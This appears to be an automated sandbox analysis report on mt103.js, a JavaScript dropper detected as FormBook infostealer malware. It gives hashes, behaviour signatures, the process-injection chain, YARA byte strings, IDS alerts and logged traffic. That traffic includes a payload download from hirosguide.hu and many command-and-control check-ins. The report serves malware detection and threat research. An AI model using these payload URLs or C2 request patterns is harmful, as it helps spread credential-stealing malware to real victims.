Windows Analysis Report
mt103.js

Overview

General Information

Sample Name: mt103.js
Analysis ID: 794331
MD5: aef9d0a0d6eb0f1acc61c9fef31df227
SHA1: 8ab951947dfa34a70ed7aeea10b7662b481049f0
SHA256: 4bfa87d48d207b7b0a04112356e6bebe73ebc8f817bb0f940ef0b1aa5f2a2c4d
Tags: js
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
JScript performs obfuscated calls to suspicious functions
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Writes to foreign memory regions
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Deletes itself after installation
Potential obfuscated javascript found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Connects to several IPs in different countries
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • wscript.exe (PID: 1680 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mt103.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • HBhG.exe (PID: 5928 cmdline: "C:\Users\user\AppData\Local\Temp\HBhG.exe" MD5: 02DF8C86345D056735FA60116B93ED2B)
      • CasPol.exe (PID: 5720 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • control.exe (PID: 4804 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
mt103.js | SUSP_obfuscated_JS_obfuscatorio | Detects JS obfuscation done by the js obfuscator (often malicious) | @imp0rtp3
  • 0x85:$c8: while(!![])
  • 0xaee:$c8: while(!![])
  • 0xa4:$d1: parseInt(_0x399b45(0x19e))/0x1+-parseInt(_0x399b45(0x1af))/0x2+parseInt(_0x399b45(0x188))/0x3*(-parseInt(_0x399b45(0x185))/0x4)+-parseInt(_0x399b45(0x1a3))/0x5+-parseInt(_0x399b45(0x171))/0x6*(
Source | Rule | Description | Author | Strings
00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x18035:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ad1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18137:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x182af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ed6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Source | Rule | Description | Author | Strings
      9.2.CasPol.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        9.2.CasPol.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x20043:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        9.2.CasPol.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x19068:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b04:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1916a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x192e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xba3d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1edea:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fd9d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          9.2.CasPol.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x20e43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          No Sigma rule has matched
          Timestamp: 01/30/23-13:40:47.278994
          SID: 2031412
          Source IP: 192.168.2.6
          Source Port: 49731
          Destination IP: 184.94.215.91
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 01/30/23-13:40:47.278994
          SID: 2031449
          Source IP: 192.168.2.6
          Source Port: 49731
          Destination IP: 184.94.215.91
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          Timestamp: 01/30/23-13:40:47.278994
          SID: 2031453
          Source IP: 192.168.2.6
          Source Port: 49731
          Destination IP: 184.94.215.91
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected

          AV Detection

          Source: mt103.js, ReversingLabs: Detection: 23%
          Source: mt103.js, Virustotal: Detection: 29%
          Source: Yara match, File source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: hirosguide.hu, Virustotal: Detection: 14%
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Avira: detection malicious, Label: HEUR/AGEN.1203876
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe, Avira: detection malicious, Label: HEUR/AGEN.1203876
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe, ReversingLabs: Detection: 55%
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, ReversingLabs: Detection: 55%
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exe, Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe, Joe Sandbox ML: detected
          Source: 9.2.CasPol.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: unknown, HTTPS traffic detected: 91.227.138.48:443 -> 192.168.2.6:49714 version: TLS 1.2
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.357027677.0000000001565000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.354954352.00000000013C9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: CasPol.exe, 00000009.00000002.398224491.00000000032B0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.357027677.0000000001565000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000003.354954352.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: CasPol.exe, 00000009.00000002.398224491.00000000032B0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\control.exe, Code function: 11_2_005031A0 FindFirstFileW,FindNextFileW,FindClose, 11_2_005031A0

          Software Vulnerabilities

          Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi, 11_2_004F8D80
          Source: C:\Windows\SysWOW64\control.exe, Code function: 4x nop then pop edi, 11_2_004F8D7F

          Networking

          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 184.94.215.91:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 184.94.215.91:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49731 -> 184.94.215.91:80
          Source: mt103.js, Return value: ['"MSXML2.XMLHTTP"']
          Source: mt103.js, Return value: ['"ResponseBody"']
          Source: Joe Sandbox View, ASN Name: OIS1US OIS1US
          Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk&s91Fd8=b8xjX_ HTTP/1.1 Host: www.laylaroseuk.com Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0&s91Fd8=b8xjX_ HTTP/1.1 Host: www.sandpiper-apts.com Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_ HTTP/1.1 Host: www.tf8dangky.online Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41&s91Fd8=b8xjX_ HTTP/1.1 Host: www.teammart.online Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&s91Fd8=b8xjX_ HTTP/1.1 Host: www.suachuadienlanh247.com Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_ HTTP/1.1 Host: www.hvlandscapes.biz Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&s91Fd8=b8xjX_ HTTP/1.1 Host: www.frogair.online Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL&s91Fd8=b8xjX_ HTTP/1.1 Host: www.mitsubangsaen.online Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=qQeRCSv6osLquMzUsT5auAtcL2kpuT7TXoM3AMsXZ7zh5sUe46PrJPqpdbUyVeYEw0ooLJaeJdeynj+iQ6oazAlglr/WxPNHjeDwf7x3jgqV&s91Fd8=b8xjX_ HTTP/1.1 Host: www.hayuterce.com Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=Tx9+97zXAbAnLmq4XNOsmb2GkF5HGNr6W72qHdNRTeliJERxp4RJ6liISWgIuo8dFog55DG7ffTMmIYpdbhnOORXqYw1ibeJvOeh5iF0aDaW&s91Fd8=b8xjX_ HTTP/1.1 Host: www.wylvxing.com Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=0GDp9E6kCyw3PTEu7mcwaVDMse4qTFHKiPIjsnORLRuzWwrUUyHW5NbJCCyvt5dATvUBD9WLW/i5ogrnJ/OA7NWjCE9u9zkY8p+SshpKLRL6&s91Fd8=b8xjX_ HTTP/1.1 Host: www.popcors.com Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=7PBSSZr71x6DL80+Go9LpHzLxq3YNNMMRlSEKhN5FSdA0XFSySCq1gq9Qp9tYYXK4CHyqoic/rLoBaFB2vw5CqcWWhDf4yMIsnGwhNAmLwJ5&s91Fd8=b8xjX_ HTTP/1.1 Host: www.thepromotionhunter.com Connection: close
          Source: global traffic HTTP traffic detected: GET /crhz/?vG=u2x6Gy1HortC0OzN6Cd7rlFhxGPGvueuCm4nHgUvPGM1CfYq7BcXTxTrgZqaFf90LIlR1PLFkcg9+OygBsERh/kgPh37+bmZ6fYtcBDUzbx8&s91Fd8=b8xjX_ HTTP/1.1 Host: www.nortonseecurity.com Connection: close
          Source: global traffic HTTP traffic detected: GET /ti/HBhG.exe HTTP/1.1 Accept: */* Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: hirosguide.hu Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.sandpiper-apts.com Connection: close Content-Length: 188 Cache-Control: no-cache Origin: http://www.sandpiper-apts.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.sandpiper-apts.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.sandpiper-apts.com Connection: close Content-Length: 1452 Cache-Control: no-cache Origin: http://www.sandpiper-apts.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.sandpiper-apts.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.tf8dangky.online Connection: close Content-Length: 188 Cache-Control: no-cache Origin: http://www.tf8dangky.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.tf8dangky.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.tf8dangky.online Connection: close Content-Length: 1452 Cache-Control: no-cache Origin: http://www.tf8dangky.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.tf8dangky.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.teammart.online Connection: close Content-Length: 188 Cache-Control: no-cache Origin: http://www.teammart.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.teammart.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.teammart.online Connection: close Content-Length: 1452 Cache-Control: no-cache Origin: http://www.teammart.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.teammart.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.suachuadienlanh247.com Connection: close Content-Length: 188 Cache-Control: no-cache Origin: http://www.suachuadienlanh247.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.suachuadienlanh247.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.suachuadienlanh247.com Connection: close Content-Length: 1452 Cache-Control: no-cache Origin: http://www.suachuadienlanh247.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.suachuadienlanh247.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.hvlandscapes.biz Connection: close Content-Length: 188 Cache-Control: no-cache Origin: http://www.hvlandscapes.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.hvlandscapes.biz/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.hvlandscapes.biz Connection: close Content-Length: 1452 Cache-Control: no-cache Origin: http://www.hvlandscapes.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.hvlandscapes.biz/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.frogair.online Connection: close Content-Length: 188 Cache-Control: no-cache Origin: http://www.frogair.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.frogair.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.frogair.online Connection: close Content-Length: 1452 Cache-Control: no-cache Origin: http://www.frogair.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.frogair.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.mitsubangsaen.online Connection: close Content-Length: 188 Cache-Control: no-cache Origin: http://www.mitsubangsaen.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mitsubangsaen.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global traffic HTTP traffic detected: POST /crhz/ HTTP/1.1 Host: www.mitsubangsaen.online Connection: close Content-Length: 1452 Cache-Control: no-cache Origin: http://www.mitsubangsaen.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mitsubangsaen.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.hayuterce.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.hayuterce.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hayuterce.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.hayuterce.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.hayuterce.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hayuterce.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.wylvxing.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.wylvxing.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.wylvxing.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.wylvxing.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.wylvxing.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.wylvxing.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.popcors.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.popcors.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.popcors.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.popcors.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.popcors.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.popcors.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.thepromotionhunter.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.thepromotionhunter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thepromotionhunter.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.thepromotionhunter.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.thepromotionhunter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thepromotionhunter.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.nortonseecurity.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.nortonseecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nortonseecurity.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.nortonseecurity.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.nortonseecurity.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nortonseecurity.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: unknownNetwork traffic detected: IP country count 11
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:39:57 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:40:20 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:40:22 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:40:25 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:40:41 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Jan 2023 12:40:44 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html
